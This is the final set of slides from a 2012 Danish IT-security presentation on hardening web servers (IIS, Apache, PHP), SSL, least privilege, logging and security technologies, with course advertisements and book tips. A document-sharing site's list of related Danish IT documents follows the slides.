85 Stadig i tvivl om SSL Hvilke versioner af SSL/TLS? Secure Sockets Layer - Transport Layer Security SSL Survey HTTP Rating Guide version 1.0 (5 July 2010) Copyright c 2010 Qualys SSL Labs (www.ssllabs.com) https://media.blackhat.com/bh-us-10/whitepapers/ristic/blackhat-usa-2010-ristic-qualys-ssl-surv pdf Næste spørgsmål er så hvilke rod-certifikater man stoler på... c copyright 2012 Solido Networks, Henrik Lund Kramshøj 85

86 Deadly sins bogen 24 Deadly Sins of Software Security Michael Howard, David LeBlanc, John Viega 2. udgave, første hed 19 Deadly Sins c copyright 2012 Solido Networks, Henrik Lund Kramshøj 86

87 Hærdning af Microsoft IIS Internet Information Services kan hærdes... det kræver blot at man følger den guide som Microsoft har lavet - og at man jævnligt følger med i opdateringer til denne guide det anbefales at bruge de tilgængelige værktøjer som eksempelvis urlscan IIS version 6 og efterfølgende er mere sikker i standard opsætningen - næsten alt er slået fra c copyright 2012 Solido Networks, Henrik Lund Kramshøj 87

88 Apache HTTPD hærdning Apache cookbook, færrest mulige moduler Security focus artikel Securing Apache 2: Step-by-Step af Artur Maj, fra 2004 men stadig relevant Det er især et godt råd at udskifte standard httpd.conf med en kortere og overskuelig udgave - evt. splitte til httpd.conf, virtual.conf, ssl.conf osv. Standard httpd.conf er over 1000 linier, min httpd.conf er ca. 300 linier uden kommentarer! Jails og chroot er en god ide Idag findes også flere bøger om PHP sikkerhed, Apache sikkerhed, mod_security konfiguration m.v. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 88

89 logging Med Apache HTTPD som eksempel Sørg for at logge og checke for fejl jævnligt check eksempelvis mange 404 fra samme IP kan være en scanner som Nikto c copyright 2012 Solido Networks, Henrik Lund Kramshøj 89

90 Yderligere sikring Vælg et operativsystem med stack protection Armorlogic profense mod_security ekstrem sikring, systrace policy eller c copyright 2012 Solido Networks, Henrik Lund Kramshøj 90

91 Hærdning af PHP websystemer Anbefalinger: brug en opdateret PHP med default indstillinger som udgangspunkt, mere sikre defaults Bemærk især: register_globals - tillader overtagelse af variable fra URL parametre allow_url_open - tillader at åbne filer med Sæt Apache til at forstå både.php og.inc m.fl. som PHP filer hærdet PHP Apache Security bogen, eventuelt kombineret med mod_security c copyright 2012 Solido Networks, Henrik Lund Kramshøj 91

92 Opsummering - hvad skal man gøre Installation, konfiguration, overvågning Hærde servere Konfigurere applikationer Programmere sikkert Sikre sine netværk bedst muligt Overvej at blokere trafik indefra og husk den menneskelige faktor KRAV til password sikkerhed KONFIGURATION til at sikre dette krav uddannelse i produkterne/programmerne/systmerne! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 92

93 Hvad kan man gøre - privilegier! Hvorfor afvikle med administrationsrettigheder - hvis der kun skal læses fra en database? least privilege betyder at man afvikler kode med det mest restriktive sæt af privileger - kun lige nok til at opgaven kan udføres. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 93

94 Undgå standard indstillinger når vi scanner efter services går det nemt med at finde dem Giv jer selv mere tid til at omkonfigurere og opdatere ved at undgå standardindstillinger Tiden der går fra en sårbarhed annonceres på bugtraq til den bliver udnyttet er meget kort idag! Ved at undgå standard indstillinger kan der måske opnås en lidt længere frist - inden ormene kommer NB: ingen garanti - og det hjælper sjældent mod en dedikeret angriber c copyright 2012 Solido Networks, Henrik Lund Kramshøj 94

95 Sikkerhedsteknologier Brug alt hvad I kan overkomme: Firewalls: IPfilter, IPtables, OpenBSD PF Kryptografi Secure Shell - SSH betragt Telnet, Rlogin, Rsh, Rexec som døde! FTP bør kun bruges til anonym FTP Intrusion Detection - Snort Sudo Tripwire, mtree, MD5 Sikkerhedspolitikken er din plan for sikkerheden - og er med til at sikre niveauet er ens Firewalls hjælper ikke mod alle trusler c copyright 2012 Solido Networks, Henrik Lund Kramshøj 95

96 Opsummering afslutning Husk følgende: Husk: IT-sikkerhed er ikke kun netværkssikkerhed! Sikkerhed kommer fra langsigtede intiativer Hvad er informationssikkerhed? Data på elektronisk form Data på fysisk form Social engineering er måske overset Computer Forensics er reaktion på en hændelse Informationssikkerhed er en proces c copyright 2012 Solido Networks, Henrik Lund Kramshøj 96

97 PROSA CTF PROSA afholdt fredag 17. september - til lørdag 18. september Capture the Flag Distribueret CTF med 6 hold og arrangørerne i Aalborg Sjovt og lærerigt - gentages helt sikkert Kilde: Get ready! Lær debuggere, perl, java at kende, start på at hacke c copyright 2012 Solido Networks, Henrik Lund Kramshøj 97

98 Questions? Henrik Lund Kramshøj You are always welcome to send me questions later via c copyright 2012 Solido Networks, Henrik Lund Kramshøj 98

99 VikingScan.org - free portscanning c copyright 2012 Solido Networks, Henrik Lund Kramshøj 99

100 Contact information Henrik Lund Kramshøj, IT-security and internet samurai Mobile: Educated from the Computer Science Department at the University of Copenhagen, DIKU CISSP and CEH certified Independent security consultant owner and partner in Solido Networks ApS c copyright 2012 Solido Networks, Henrik Lund Kramshøj 100

101 Reklamer: kursusafholdelse Følgende kurser afholdes med mig som underviser IPv6 workshop - 1 dag Introduktion til Internetprotokollerne og forberedelse til implementering i egne netværk. Wireless teknologier og sikkerhed workshop dage En dag med fokus på netværksdesign og fornuftig implementation af trådløse netværk, samt integration med hjemmepc og wirksomhedsnetværk. Hacker workshop 2 dage Workshop med detaljeret gennemgang af hackermetoderne angreb over netværk, exploitprogrammer, portscanning, Nessus m.fl. Forensics workshop 2 dage Med fokus på tilgængelige open source værktøjer gennemgås metoder og praksis af undersøgelse af diskimages og spor på computer systemer Moderne Firewalls og Internetsikkerhed 2 dage Informere om trusler og aktivitet på Internet, samt give et bud på hvorledes en avanceret moderne firewall idag kunne konfigureres. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 101

102 Hackers Challenge Hacker s Challenge : Test Your Incident Response Skills Using 20 Scenarios af Mike Schiffman McGraw-Hill Osborne Media; (October 18, 2001) ISBN: Hacker s Challenge II : Test Your Network Security and Forensics Skills af Mike Schiffman McGraw-Hill Osborne Media, 2003 ISBN: Bøgerne indeholder scenarier i første halvdel, og løsninger i anden halvdel - med fokus på relevante logfiler og sårbarheder c copyright 2012 Solido Networks, Henrik Lund Kramshøj 102

103 CISSP fra ISC2 Primære website: Vigtigt link Den kræver mindst 3 års erfaring indenfor et relevant fagområde Multiple choice 6 timer 250 spørgsmål - kan tages i Danmark c copyright 2012 Solido Networks, Henrik Lund Kramshøj 103

Capture The Flag intro - basic hacking

Capture The Flag intro - basic hacking Welcome to Capture The Flag intro - basic hacking Henrik Lund Kramshøj hlk@solidonetworks.com http://www.solidonetworks.com Slides are available as PDF c copyright 2010 Solido Networks, Henrik Lund Kramshøj

Læs mere

UNF hacking - black/white hat

UNF hacking - black/white hat Welcome to UNF hacking - black/white hat Henrik Lund Kramshøj hlk@solido.net http://www.solidonetworks.com c copyright 2012 Solido Networks, Henrik Lund Kramshøj 1 Formålet med foredraget Don t Panic!

Læs mere

Basic hacking. Velkommen til. Henrik Lund Kramshøj hlk@solidonetworks.com. http://www.solidonetworks.com

Basic hacking. Velkommen til. Henrik Lund Kramshøj hlk@solidonetworks.com. http://www.solidonetworks.com Velkommen til Basic hacking Henrik Lund Kramshøj hlk@solidonetworks.com http://www.solidonetworks.com c copyright 2010 Solido Networks, Henrik Lund Kramshøj 1 Formålet med foredraget Don t Panic! Skabe

Læs mere

Vejledning til at tjekke om du har sat manuel IP på din computer.

Vejledning til at tjekke om du har sat manuel IP på din computer. Indhold Vejledning til at, komme på nettet. (DANSK)... 2 Gælder alle systemer.... 2 Vejledning til at tjekke om du har sat manuel IP på din computer.... 2 Windows 7... 2 Windows Vista... 2 Windows XP...

Læs mere

Navn: Søren Guldbrand Pedersen Klasse: 2i Fag: Applikationer Opgave: Eksamens-spørgsmål Lære: Kim Rundblad Side 1 af 9 Dato: 26-06-2003

Navn: Søren Guldbrand Pedersen Klasse: 2i Fag: Applikationer Opgave: Eksamens-spørgsmål Lære: Kim Rundblad Side 1 af 9 Dato: 26-06-2003 Applikationer Eksamensspørgsmål Spørgsmål 1: Navn: Søren Guldbrand Pedersen Side 1 af 9 Dato: 26-06-2003 Dynamisk hjemmeside på WebNet modul. Vis hvorledes en dynamisk hjemmeside sættes sammen med html

Læs mere

Undgå DNS Amplification attacks

Undgå DNS Amplification attacks Undgå DNS Amplification attacks 29. november 2013 Til: Den it-sikkerhedsansvarlige Resumé Center for Cybersikkerhed har i den seneste tid set flere DDoS-angreb mod danske myndigheder og private virksomheder.

Læs mere

Dagens program. Domæner. change log- screen shots hver gang I har arbejdet med themet. Arkitekturen bag en wp blog. Hvad er widgets.

Dagens program. Domæner. change log- screen shots hver gang I har arbejdet med themet. Arkitekturen bag en wp blog. Hvad er widgets. Dagens program Har alle fået? Har nogen betalt for meget? Hav jeres koder klar Domæner change log- screen shots hver gang I har arbejdet med themet. Arkitekturen bag en wp blog Hvad er widgets Hvad er

Læs mere

Opsætning af MobilePBX med Kalenderdatabase

Opsætning af MobilePBX med Kalenderdatabase Opsætning af MobilePBX med Kalenderdatabase Dette dokument beskriver hvorledes der installeres Symprex Exchange Connector og SQL Server Express for at MobilePBX kan benytte kalenderadadgang via database

Læs mere

Installation. Aesiras Internet hjemmeside og webshop. Aesiras -integreret Regnskab, Handel og Internet

Installation. Aesiras Internet hjemmeside og webshop. Aesiras -integreret Regnskab, Handel og Internet Installation Aesiras Internet hjemmeside og webshop Aesiras -integreret Regnskab, Handel og Internet Installationsvejledning Tak fordi du valgte Aesiras Business & Internet. I denne vejledning vil vi guide

Læs mere

PHP Quick Teknisk Ordbog

PHP Quick Teknisk Ordbog PHP Quick Teknisk Ordbog Af Daniel Pedersen PHP Quick Teknisk Ordbog 1 Indhold De mest brugte tekniske udtryk benyttet inden for web udvikling. Du vil kunne slå de enkelte ord op og læse om hvad de betyder,

Læs mere

Terese B. Thomsen 1.semester Formidling, projektarbejde og webdesign ITU DMD d. 02/11-2012

Terese B. Thomsen 1.semester Formidling, projektarbejde og webdesign ITU DMD d. 02/11-2012 Server side Programming Wedesign Forelæsning #8 Recap PHP 1. Development Concept Design Coding Testing 2. Social Media Sharing, Images, Videos, Location etc Integrates with your websites 3. Widgets extend

Læs mere

TEKNISKE FORHOLD VEDR. ADGANG TIL VP.ONLINE. Brugervejledning

TEKNISKE FORHOLD VEDR. ADGANG TIL VP.ONLINE. Brugervejledning TEKNISKE FORHOLD VEDR. ADGANG TIL VP.ONLINE vp.online 2011 01-10-2011 Indholdsfortegnelse 1 PROBLEMER MED AT SE VP.ONLINE... 3 2 BROWSER KONFIGURATION... 6 3 SKRIVEADGANG TIL DREV... 7 4 SESSION TIMEOUT

Læs mere

Sikre apps på ios og Android. Mads Jensen & Søren Toft @ArbitraryJensen & @SorenToft

Sikre apps på ios og Android. Mads Jensen & Søren Toft @ArbitraryJensen & @SorenToft Sikre apps på ios og Android Mads Jensen & Søren Toft @ArbitraryJensen & @SorenToft "Next vulnerability shift will go from WebApp to Mobile. It'll take at least another 5-7yrs though." Jeremiah Grossman

Læs mere

Vejledning. Opsætning af Trio Web Vers 2.0 feb. 2010

Vejledning. Opsætning af Trio Web Vers 2.0 feb. 2010 Opsætning af Trio Web Vers 2.0 feb. 2010 Indholdsfortegnelse Opsætning af Trio Web... 3 Generel opsætning af Trio Web... 3 Databaseopsætning... 3 DB... 3 Aar... 4 Login... 4 Internet... 4 Port... 4 Registreringsnøgle...

Læs mere

Xenapps/Citrix klient opsætningsvejledning til Integra driftløsningen. Xenapps/Citrix basisport. Xenapps/Citrix Service. Xenapps/Citrix XML service

Xenapps/Citrix klient opsætningsvejledning til Integra driftløsningen. Xenapps/Citrix basisport. Xenapps/Citrix Service. Xenapps/Citrix XML service Integra klient opsætningsvejledning til Integra driftløsningen Hedensted Folkebibliotek Funktion Type Indhold Note Gruppe Hedensted Farm BibFarm3 Server Janne basisport Service XML service HTTPS 443 TCP

Læs mere

Hvor er mine runde hjørner?

Hvor er mine runde hjørner? Hvor er mine runde hjørner? Ofte møder vi fortvivlelse blandt kunder, når de ser deres nye flotte site i deres browser og indser, at det ser anderledes ud, i forhold til det design, de godkendte i starten

Læs mere

Basal TCP/IP fejlfinding

Basal TCP/IP fejlfinding Basal TCP/IP fejlfinding Dette notat beskriver en række enkle metoder til fejlfinding på TCP/IP problemer. Metoderne er baseret på kommandoer, som er en fast bestanddel af Windows. Notatet er opbygget

Læs mere

Applikations Virtualisering. Anders Keis Hansen Anders.keis.hansen@atea.dk

Applikations Virtualisering. Anders Keis Hansen Anders.keis.hansen@atea.dk Applikations Virtualisering Anders Keis Hansen Anders.keis.hansen@atea.dk Hvem er jeg Anders Keis Hansen Arbejder i Ateas konsulent afdeling Baggrund som System administrator, IT Arkitekt primært med fokus

Læs mere

Netkit Dokumentation

Netkit Dokumentation Netkit Dokumentation For at kunne installere Netkit på en linux maskine har vi benyttet os af nogle forskellige unix commands. Til brugen af Netkit brugte vi også kommandoerne der står med fed. cd - change

Læs mere

Installation af Oracle 10g Release 2 database

Installation af Oracle 10g Release 2 database Installation af Oracle 10g Release 2 database Oracle 10g database indeholder databasesoftware, enterprise manager, SQL*Plus m.m., HTML DB (i dag kendt som Application Express) og tilhørende HTTP Server

Læs mere

Ruko SmartAir. Updater installation

Ruko SmartAir. Updater installation Ruko SmartAir Updater installation Introduktion. Updateren er en speciel enhed som giver os mulighed for at tilføje, læse og skrive funktioner i en offline installation. Med læse og skrive funktionen kan

Læs mere

BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015

BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015 BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015 SAS VISUAL ANALYTICS 7.1 ADMINISTRATOR Mulighed for at udføre handlinger på flere servere

Læs mere

Hvordan sikres personfølsomme data - og adgangen til disse så persondataloven overholdes. Klaus Kongsted, CRO, Dubex A/S Dubex A/S, den 5.

Hvordan sikres personfølsomme data - og adgangen til disse så persondataloven overholdes. Klaus Kongsted, CRO, Dubex A/S Dubex A/S, den 5. Hvordan sikres personfølsomme data - og adgangen til disse så persondataloven overholdes Klaus Kongsted, CRO, Dubex A/S Dubex A/S, den 5. maj 2015 Den nuværende persondatalov Fra år 2000, løbende smårevisioner

Læs mere

Undervisningen, H6. Hovedforløb 6. Undervisningsfag. Bekendtgørelsesfag. Netværksdesign, CCDP, ARCH

Undervisningen, H6. Hovedforløb 6. Undervisningsfag. Bekendtgørelsesfag. Netværksdesign, CCDP, ARCH Undervisningen, H6 Hovedforløb 6 5 ugers varighed Undervisningsfag Bekendtgørelsesfag Grundfag: erverteknolog Blandet miljø erverteknologi - Design af datacenterløsning Områdefag: Bundne specialefag: erverteknologi

Læs mere

Installation af MySQL server på PC

Installation af MySQL server på PC Installation af MySQL server på PC (Udgave 0.02 2013-Oktober-06 @ 22:30 Chris Bagge, Mindre rettelser) Dette er en kort beskrivelse af hvordan man får installeret en MySQL server på en PC med Windows 7.

Læs mere

Paranoia and government hacking workshop

Paranoia and government hacking workshop Paranoia and government hacking workshop Henrik Lund Kramshøj hlk@solido.net 25. oktober 2013 Indhold 1 Wireshark installation 3 2 Sniffing network packets 4 3 Installation af alternativ browser 5 4 Installation

Læs mere

Installation af Bilinfo på Windows

Installation af Bilinfo på Windows Installation af Bilinfo på Windows Eksempler i denne vejledning er taget fra Windows 7 og Internet Explorer 8 Download det nødvendige program. Gå ind på www.bilinfo.dk/download Klik på download ud for:

Læs mere

Smartair 6.0. Installations guide

Smartair 6.0. Installations guide Smartair 6.0 Installations guide Indholdsfortegnelse 1 Indledning... 4 2 System Oversigt... 4 3 Installation... 5 3.1 System Krav... 5 3.2 Klargøring af installationen... 5 3.3 Afinstallere tidligere TS1000

Læs mere

Bruger Manual PC Valtronics Udendørs Kamera - Windows system

Bruger Manual PC Valtronics Udendørs Kamera - Windows system Bruger Manual PC Valtronics Udendørs Kamera - Windows system Brugervejledning til PC (windows) 1. Installation af kamera Vejledningen er almen for alle Valtronics kameraer, og derfor kan billederne af

Læs mere

Innovative Business Software A/S

Innovative Business Software A/S Innovative Business Software A/S Technical Note Klienter - Installation og opdatering 26. november 2014 ii MEDDELELSE OM OPHAVSRET Copyright 2014 Innovative Business Software A/S. Alle rettigheder forbeholdt.

Læs mere

Vejledning til opsætning af trådløst netværk NPD4759-00 DA

Vejledning til opsætning af trådløst netværk NPD4759-00 DA Vejledning til opsætning af trådløst netværk NPD4759-00 DA Kontrol af dit netværk Bekræft din computers netværk og vælg så, hvad du vil gøre som det næste. Følg instruktionerne for det miljø som dine netværksenheder,

Læs mere

Interne og eksterne trusler Sådan håndterer vi trusler fra remote access/ad-hoc adgange fra medarbejdere og leverandører

Interne og eksterne trusler Sådan håndterer vi trusler fra remote access/ad-hoc adgange fra medarbejdere og leverandører Interne og eksterne trusler Sådan håndterer vi trusler fra remote access/ad-hoc adgange fra medarbejdere og leverandører Ken Willén Security Business Manager Ezenta Agenda og afgrænsning Interne og eksterne

Læs mere

how to save excel as pdf

how to save excel as pdf 1 how to save excel as pdf This guide will show you how to save your Excel workbook as PDF files. Before you do so, you may want to copy several sheets from several documents into one document. To do so,

Læs mere

APPLIKATIONSARKITEKTUR ERP INFRASTRUKTUR. EG Copyright

APPLIKATIONSARKITEKTUR ERP INFRASTRUKTUR. EG Copyright APPLIKATIONSARKITEKTUR ERP INFRASTRUKTUR EG Copyright Infrastruktur er mere end nogle servere... Den Mentale Infrastruktur Den Fysiske Infrastruktur Den Mentale Infrastruktur Vi vil jo gerne have vores

Læs mere

KIH Database. Systemdokumentation for KIH Databasen. 1. maj 2013. Side 1 af 13

KIH Database. Systemdokumentation for KIH Databasen. 1. maj 2013. Side 1 af 13 KIH Database Systemdokumentation for KIH Databasen 1. maj 2013 Side 1 af 13 Indholdsfortegnelse Indholdsfortegnelse... 2 Indledning... 3 Systemoverblik... 3 KIH Database applikationsserver... 5 Forudsætninger

Læs mere

Internet Information Services (IIS)

Internet Information Services (IIS) Internet Information Services (IIS) Casper Simonsen & Yulia Sadovskaya H1we080113 06-11-2013 Indholdsfortegnelse Problemformulering... 2 Hvorfor:... 2 Hvad:... 2 Hvordan:... 2 Problembehandling... 3 Introduktion...

Læs mere

FairSSL Fair priser fair support

FairSSL Fair priser fair support Microsoft IIS 6 Certifikat administration Følgende vejledning beskriver hvordan man installere et certifikat på en IIS 6 For support og hjælp til anvendelsen af denne vejledning kan du kontakte FairSSL

Læs mere

PHP 3 UGERS FORLØB PHP, MYSQL & SQL

PHP 3 UGERS FORLØB PHP, MYSQL & SQL PHP 3 UGERS FORLØB PHP, MYSQL & SQL Uge 1 & 2 Det basale: Det primære mål efter uge 1 og 2, er at få forståelse for hvordan AMP miljøet fungerer i praksis, og hvordan man bruger PHP kodesproget til at

Læs mere

MODERNISERINGSSTYRELSEN ØSLDV WINDOWS SERVICE DOKUMENTATION, INSTALLATION OG KONFIGURERING AF ØSLDV/RAY WINDOWSSERVICE

MODERNISERINGSSTYRELSEN ØSLDV WINDOWS SERVICE DOKUMENTATION, INSTALLATION OG KONFIGURERING AF ØSLDV/RAY WINDOWSSERVICE Indhold Ændringshistorik... 2 Formål... 2 Om programmet... 2 Systemkrav... 2 Installation... 3 Event Log... 5 Installationsprogrammets skærmbillede... 6 Konfigurering af xml-opsætningsfil... 7 Beskrivelse

Læs mere

SAS2WPS Workshop. Torben Christensen! Senior Partner, MSc.! email: torben.christensen@uniqcus.com! tlf: +45 3064 9150. Copyright UniQcus 2014

SAS2WPS Workshop. Torben Christensen! Senior Partner, MSc.! email: torben.christensen@uniqcus.com! tlf: +45 3064 9150. Copyright UniQcus 2014 SAS2WPS Workshop! Torben Christensen! Senior Partner, MSc.! email: torben.christensen@uniqcus.com! tlf: +45 3064 9150 Copyright UniQcus 2014 Torben Christensen 17 years with SAS institute (starting okt85)

Læs mere

Introduktion til computernetværk

Introduktion til computernetværk Introduktion til computernetværk 24. oktober 2011 Mads Pedersen, OZ6HR mads@oz6hr.dk Slide 1 Plan i dag Netværk generelt Lokalnet Internet Router Kabel/trådløs Firewall Lokal server (forward) Warriors

Læs mere

PID2000 Archive Service

PID2000 Archive Service PROLON CONTROL SYSTEMS Herstedvesterstræde 56 DK-2620 Albertslund Danmark Tlf.: (+45) 43620625 Fax: (+45) 43623125 PID2000 Archive Service Bruger vejledning Juni 2002 Denne manual beskriver brugen af softwaren

Læs mere

Godkendelsesdato Version Rettet af Rettelse(r)

Godkendelsesdato Version Rettet af Rettelse(r) REST/SOAP Services Referenceimplementation Godkendelsesdato Version Rettet af Rettelse(r) 17/6-2010 1.0 Stefan L. Jensen 1 Indhold 1. Indledning... 3 2. Visual Studio solution... 3 3. Konfiguration...

Læs mere

EasyIQ ConnectAnywhere Release note

EasyIQ ConnectAnywhere Release note EasyIQ ConnectAnywhere Release note Version 2.4 Der er over det sidste år lavet en lang række forbedringer, tiltag og fejlrettelser. Ændringer til forudsætningerne: o Klienten skal ved førstegangs login

Læs mere

FAQ Hjælp til installation af Trader

FAQ Hjælp til installation af Trader FAQ Hjælp til installation af Trader Indhold 1. Jeg kan ikke downloade Trader... 2 Problem 1: Jeg får en besked om blocked pop-up... 2 Problem 2: Programmet blev ikke downloadet... 3 Problem 3: Jeg kan

Læs mere

Bogen&om&net)hacking& &

Bogen&om&net)hacking& & Bogenomnet)hacking 5 FORORD%...%9! 1.%INTRODUKTION%...%11! 2.%FINDE%INFORMATIONER%...%15! BESTEM!DIG!...!16! HAV!TILLADELSERNE!I!ORDEN!...!16! OFFENTLIGE!INFORMATIONER!...!16! ANDRE!ORGANISATIONER!...!19!

Læs mere

LUDUS WEB. Installations- og konfigurations-vejledning. Den 7. april 2009. J.nr.: 4004 V0624 09

LUDUS WEB. Installations- og konfigurations-vejledning. Den 7. april 2009. J.nr.: 4004 V0624 09 LUDUS WEB Installations- og konfigurations-vejledning Den 7. april 2009 J.nr.: 4004 V0624 09 CSC Scandihealth A/S, P.O. Pedersens Vej 2, DK-8200 Århus N Tlf. +45 3614 4000, fax +45 3614 7324, www.scandihealth.dk,

Læs mere

Security as a Service hvorfor, hvornår og hvordan. Gorm Mandsberg, gma@dubex.dk Aarhus, 13.06.2013

Security as a Service hvorfor, hvornår og hvordan. Gorm Mandsberg, gma@dubex.dk Aarhus, 13.06.2013 Security as a Service hvorfor, hvornår og hvordan Gorm Mandsberg, gma@dubex.dk Aarhus, 13.06.2013 SecaaS hvorfor, hvornår og hvordan hvad Hvorfor.. Hvornår.. Hvordan.. Disclamer: Dubex er MSSP og leverer

Læs mere

LW313 Sweex Wireless 300N Adapter USB

LW313 Sweex Wireless 300N Adapter USB LW313 Sweex Wireless 300N Adapter USB Bemærk venligst! Udsæt ikke Sweex Wireless 300N Adapter USB for ekstreme temperaturer. Placér ikke adapteren i direkte sollys eller i nærheden af radiatorer eller

Læs mere

DAU REMOTE ACCESS LØSNINGSMULIGHEDER OG TEKNOLOGIER MED REMOTE ACCESS JOHN AMMENTORP

DAU REMOTE ACCESS LØSNINGSMULIGHEDER OG TEKNOLOGIER MED REMOTE ACCESS JOHN AMMENTORP DAU REMOTE ACCESS LØSNINGSMULIGHEDER OG TEKNOLOGIER MED REMOTE ACCESS JOHN AMMENTORP AGENDA 01 Kort præsentation 02 Behov i forbindelse med de 4 dimensioner 03 Koncept for sikker forbindelser 04 Netværkssikkerhed

Læs mere

Svar på de mest almindelige Citrix spørgsmål

Svar på de mest almindelige Citrix spørgsmål Svar på de mest almindelige Citrix spørgsmål Henrik Meyer og Ajâja Hyttel Oprettet: 24/6-13 Sidst revideret 14/5-14 h t t p s : / / c i t r i x. a a b n e t. d k Hvad er nyt i Citrix?... 2 Hvis du ikke

Læs mere

QUICK MANUAL BRUGERNAVN: ADMIN PASSWORD: 00000 APP: SMARTEYES PRO PORT: 50100. SecVision - Quick Manual v1.0

QUICK MANUAL BRUGERNAVN: ADMIN PASSWORD: 00000 APP: SMARTEYES PRO PORT: 50100. SecVision - Quick Manual v1.0 QUICK MANUAL BRUGERNAVN: ADMIN PASSWORD: 00000 APP: SMARTEYES PRO PORT: 50100 SecVision - Quick Manual v1.0 1. System Login 1.1. Bruger Login ID: admin Password: 00000 1.2. Indstilling af dato/tid og harddisk

Læs mere

Advanced Word Template Brugermanual

Advanced Word Template Brugermanual Advanced Word Template Brugermanual Forord: Advanced Word Template er et værktøj, der anvendes sammen med Microsoft Word til at opbygge ensartet beskrivelser på en mere intelligent måde end Copy and Paste

Læs mere

Installation og Drift. Aplanner for Windows Systemer Version 8.15

Installation og Drift. Aplanner for Windows Systemer Version 8.15 Installation og Drift Aplanner for Windows Systemer Version 8.15 Aplanner for Windows løsninger Tekniske forudsætninger Krav vedr. SQL Server SQL Server: SQL Server 2008 Express, SQL Server 2008 R2 eller

Læs mere

Opsætning af FTP- og webserver 22. januar 2007

Opsætning af FTP- og webserver 22. januar 2007 Opsætning af FTP- og webserver 22. januar 2007 Mads Pedersen, OZ6HR mads@oz6hr.dk Plan Generelt: Teori og praksis. Tager sikkert ikke så lang tid Hvad bruges en FTP- og webserver til? Hvad skal der bruges

Læs mere

Hacking and social media - controlling your data

Hacking and social media - controlling your data Welcome to Hacking and social media - controlling your data Henrik Lund Kramshøj hlk@solidonetworks.com http://www.solidonetworks.com c copyright 2011 Solido Networks, Henrik Lund Kramshøj 1 Goal of this

Læs mere

PGP tutorial og keysigning workshop

PGP tutorial og keysigning workshop Velkommen til PGP tutorial og keysigning workshop The Camp - Juli 2005 Henrik Lund Kramshøj hlk@security6.net http://www.security6.net og Flemming Jacobsen fj@batmule.dk c copyright 2005 Security6.net,

Læs mere

Netteknik 1 Byg et netværk med SO-HO router Øvelse

Netteknik 1 Byg et netværk med SO-HO router Øvelse Netværk med Ethernet-kabler på SOHO router HOLD NUMMER: Beskrivelse Denne øvelse opbygger og tester trinvis et fysisk netværk med 2 Pc er, en SO-HO router, en Internetadgang samt diverse Ethernet-kabling.

Læs mere

Umbraco installationsvejledning

Umbraco installationsvejledning på et ScanNet ASP Webhotel Indledning Beskrivelse Denne vejledning vil indeholde installation af CMS systemet Umbraco på et ASP Webhotel. Det dansk grundlagt Content Management System (CMS) Umbraco er

Læs mere

Spørgsmål: Hvordan kan jeg sætte routeren op uden brug af CD en? Svar: Routeren kan sættes op manuelt iht. step by step guiden nedenfor!

Spørgsmål: Hvordan kan jeg sætte routeren op uden brug af CD en? Svar: Routeren kan sættes op manuelt iht. step by step guiden nedenfor! Spørgsmål: Hvordan kan jeg sætte routeren op uden brug af CD en? Svar: Routeren kan sættes op manuelt iht. step by step guiden nedenfor! Produkter dækket af denne step by step guide: De fleste routere

Læs mere

Fuld installation af Jit-klient

Fuld installation af Jit-klient Fuld installation af Jit-klient Indholdsfortegnelse Systemkrav til afvikling af Jit-klienten...3 Opsætning af firewall...4 Om installationsfilen...5 Installation af MSI-filen...6 Om SSL-certifikater...13

Læs mere

Guide til at lave din egen hjemmeside Maria, Mads, Morten Sebastian og Marc

Guide til at lave din egen hjemmeside Maria, Mads, Morten Sebastian og Marc 7/2-2014 Guide til at lave din egen hjemmeside Maria, Mads, Morten Sebastian og Marc Kommunikation/IT 14 Indhold Opsætning af webserver... 2 Secure Shell - PuTTY... 2 Ændring af kodeord... 3 Installation

Læs mere

Agenda. Muligheder for anvendelse. Komponenter. Features. Restore muligheder. DR og TSM integration. Repository. Demo. Spørgsmål

Agenda. Muligheder for anvendelse. Komponenter. Features. Restore muligheder. DR og TSM integration. Repository. Demo. Spørgsmål Agenda Muligheder for anvendelse Komponenter Features Restore muligheder DR og TSM integration Repository Demo Spørgsmål Muligheder for anvendelse Data Center dmsave/lokal TSM Remote Office Application

Læs mere

Database for udviklere. Jan Lund Madsen PBS10107

Database for udviklere. Jan Lund Madsen PBS10107 Database for udviklere Jan Lund Madsen PBS10107 Indhold LINQ... 3 LINQ to SQL og Arkitektur... 3 O/R designere... 5 LINQ Den store introduktion med.net 3.5 er uden tvivl LINQ(udtales link): Language-INtegrated

Læs mere

Projekt: VAX NemHandel 4.0

Projekt: VAX NemHandel 4.0 Ejer: mysupply ApS Projekt: VAX NemHandel 4.0 Emne: Dette dokument beskriver de tekniske specifikationer for VAX NemHandel 4.0 samt krav til miljøet, herunder hardware og software, hvori VAX NemHandel

Læs mere

Vejledning til Teknisk opsætning

Vejledning til Teknisk opsætning Vejledning til Teknisk opsætning v. 1.0 Adm4you, 2010. Indhold Kort om denne vejledning... 3 Generelt om easyourtime... 3 Installation af databasen... 3 Sikkerhed og rettigheder... 4 SQL Login... 4 Rettigheder

Læs mere

Vind Seminar Fredericia 4. april 2013 JOB2SEA

Vind Seminar Fredericia 4. april 2013 JOB2SEA Vind Seminar Fredericia 4. april 2013 JOB2SEA Rekrutteringsstrategi i et svært marked. Helle Drachmann Baggrund Job- & CV database Outplacement & transition management Koncern HR Selvstændig virksomhed

Læs mere

Opdatering af ISOWARE til version 6.1.0

Opdatering af ISOWARE til version 6.1.0 Opdatering af ISOWARE til version 6.1.0 September 2015 Indhold Kontaktoplysninger... 1 VIGTIGT... 2 Opdatering af trejdepartssoftware... 2 Opdatering til version 6.1.0.... 2 1. Backup af databasen... 3

Læs mere

Nyhedsbrev 15 Februar 2008

Nyhedsbrev 15 Februar 2008 Nyhedsbrev 15 Februar 2008 FTU Boghandel Halmstadgade 6, 8200 Århus N Tlf: 86 10 03 38 / Mail:ftu@ats.dk / Inet: www.ftu.dk Hvem er FTU Boghandel? FTU Boghandel er en specialboghandel indenfor teknik,

Læs mere

SSSystems.local. Netværk. Sikkerhed. Webserver

